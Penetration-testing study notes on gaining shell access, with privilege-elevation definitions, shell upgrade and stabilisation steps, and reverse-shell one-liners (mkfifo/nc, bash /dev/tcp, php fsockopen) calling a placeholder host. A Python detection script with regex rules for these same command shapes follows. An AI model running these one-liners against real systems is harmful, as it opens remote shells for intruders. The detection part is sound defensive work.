Exploit (Gaining Access)

Definitions

horizontal elevation = gaining the privileges of another user at the same level of access

vertical elevation = gaining the highest privileges (root/administrator)

Reverse Shell

Shell upgrading

/usr/bin/script -qc /bin/bash /dev/null # works almost all the time

python3 -c 'import pty;pty.spawn("/bin/bash")' # only if python is installed

Shell Stabilization

export TERM=xterm # this will give us access to term commands such as clear
Ctrl + Z # background the shell
stty raw -echo; fg # this does two things: 1. it turns off our own terminal echo (which gives us access to tab autocompletion, the arrow keys, and Ctrl + C to kill processes); 2. it foregrounds the shell, completing the process.

Write multiple lines in a file with echo

echo "line 1
line 2" >> file.txt

Bash reverse shell one-liners

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip] 4444 >/tmp/f

bash -c "bash -i >& /dev/tcp/[ip]/4444 0>&1" # it may be possible to omit 'bash -c' at the beginning

nc [IP] [PORT]

php -r '$sock=fsockopen("[IP]",[port]);exec("/bin/sh -i <&3 >&3 2>&3");'
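
Detection side (added example, not part of the original notes): Python logic that matches the command shapes listed above in process command lines, such as those recorded by process-execution logging. Rule names, the sample lines and the 192.0.2.10 documentation address are constructed for illustration.

```python
import re

# Added example: rule names and sample lines are constructed for illustration.
# Each pattern targets one command shape listed in these notes.
RULES = {
    "fifo_nc_shell": re.compile(r"mkfifo\s+\S+.*\|\s*(/bin/)?(ba)?sh\s+-i.*\|\s*nc\s"),
    "bash_dev_tcp": re.compile(r"(ba)?sh\s+-i\s*>&\s*/dev/tcp/[^/\s]+/\d+"),
    "php_fsockopen_shell": re.compile(r"fsockopen\(.*\).*exec\(.*(/bin/)?(ba)?sh\s+-i"),
    "pty_spawn_upgrade": re.compile(r'''pty\.spawn\(\s*["'](/bin/)?(ba)?sh["']\s*\)'''),
    "script_upgrade": re.compile(r"\bscript\s+-qc\s+(/bin/)?(ba)?sh\s+/dev/null"),
}

def classify(cmdline):
    """Return the names of all rules matching one process command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def scan(cmdlines):
    """Return (index, cmdline, rule names) for every line that matches a rule."""
    hits = []
    for i, line in enumerate(cmdlines):
        names = classify(line)
        if names:
            hits.append((i, line, names))
    return hits

# Constructed sample: 192.0.2.10 is a documentation address (TEST-NET-1).
SAMPLE = [
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4444 >/tmp/f",
    'bash -c "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"',
    """php -r '$sock=fsockopen("192.0.2.10",4444);exec("/bin/sh -i <&3 >&3 2>&3");'""",
    """python3 -c 'import pty;pty.spawn("/bin/bash")'""",
    "/usr/bin/script -qc /bin/bash /dev/null",
    "nc -zv 192.0.2.10 443",    # benign port check
    "script -q session.log",    # benign session recording
    "mkfifo /tmp/backup.pipe",  # benign named pipe
]

if __name__ == "__main__":
    for idx, line, names in scan(SAMPLE):
        print(f"line {idx}: {','.join(names)}: {line}")
```

A bare nc client connection is not flagged on its own here; only the shapes that wire a shell to a socket or allocate a pty for one are matched.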